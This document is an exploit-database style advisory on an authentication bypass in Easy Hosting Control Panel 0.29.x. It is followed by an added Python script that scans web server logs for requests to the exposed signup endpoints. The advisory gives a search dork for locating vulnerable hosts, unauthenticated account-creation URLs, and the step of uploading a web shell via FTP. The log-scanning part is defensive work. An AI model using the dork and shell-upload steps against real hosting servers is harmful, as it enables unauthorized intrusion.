Owned EHCP - using Auth Bypass


  • Owned EHCP - using Auth Bypass

    Owned EHCP (using Auth Bypass)

    # Exploit Title: Easy Hosting Control Panel Admin Auth Bypass
    # Google Dork: inurl:/ehcp/?op=applyfordomainaccount "logout"
    # Date: 10/04/2011
    # Author: Jasman
    # Software Link: https://launchpad.net/ehcp & http://www.ehcp.net
    # Version: 0.29.10 - 0.29.13
    # Tested on: Ubuntu, Debian
    # Category: webapps
    # Other Link: https://bugs.launchpad.net/ehcp/+bug/865889

    + Description
    Easy Hosting Control Panel is designed for hosting multiple domains on a single machine.
    It uses LAMP (Linux, Apache, MySQL, PHP). Its aims: easily installable, easy to use, non-complex, functional.

    + Vulnerable:
    Adding an FTP account and a domain does not require a login:
    http://www.site.com/vhosts/ehcp/?op=applyforaccount
    http://www.site.com/vhosts/ehcp/?op=applyforftpaccount
    http://www.site.com/vhosts/ehcp/index.php?op=applyfordomainaccount

    + Exploit
    Upload a shell via FTP:
    http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php

    + Tested On
    0.29.13
    0.29.11
    0.29.10
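For administrators checking whether their own EHCP host serves these signup operations to anonymous clients, the following is an added example, not part of the original post or of EHCP. It scans web server access logs for requests to the three `op` values listed above; it assumes the Apache "combined" log format, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Self-service operations the advisory lists as reachable without a login.
SIGNUP_OPS = {"applyforaccount", "applyforftpaccount", "applyfordomainaccount"}

# Assumed format: Apache "combined" (client, timestamp, request line, status).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def signup_op(target):
    """Return the EHCP signup op named in a request target, or None."""
    parts = urlsplit(target)
    if "/ehcp/" not in parts.path.lower() + "/":
        return None
    for value in parse_qs(parts.query).get("op", []):
        if value.lower() in SIGNUP_OPS:
            return value.lower()
    return None

def find_signup_hits(lines):
    """Group served signup-endpoint requests by client address."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        op = signup_op(m["target"])
        # Assumption: a 2xx/3xx status means the form was served or accepted;
        # 401/403/404 means the endpoint is already blocked.
        if op and m["status"][0] in "23":
            hits[m["ip"]].append((m["ts"], m["method"], op))
    return dict(hits)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2011:13:55:36 +0000] "GET /vhosts/ehcp/?op=applyforftpaccount HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2011:13:56:02 +0000] "POST /vhosts/ehcp/index.php?op=applyfordomainaccount HTTP/1.1" 200 4871 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2011:14:01:10 +0000] "GET /vhosts/ehcp/?op=applyforaccount HTTP/1.1" 403 199 "-" "curl/7.21"
198.51.100.9 - - [10/Oct/2011:14:02:44 +0000] "GET /vhosts/ehcp/ HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, events in find_signup_hits(SAMPLE_LOG).items():
        for ts, method, op in events:
            print(f"{ip} [{ts}] {method} op={op}")
```

Any client reported here reached a signup form without the request being refused, so the accounts and domains created around those timestamps are the ones to review.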